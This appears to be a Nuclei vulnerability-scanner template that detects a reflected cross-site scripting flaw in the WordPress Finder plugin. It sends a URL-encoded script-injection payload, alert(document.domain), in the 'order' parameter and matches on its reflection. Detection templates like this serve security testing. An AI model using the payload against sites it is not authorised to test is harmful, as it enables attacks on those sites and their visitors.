id: wp-finder-xss

info:
  name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  reference:
    - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
  tags: wordpress,xss,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
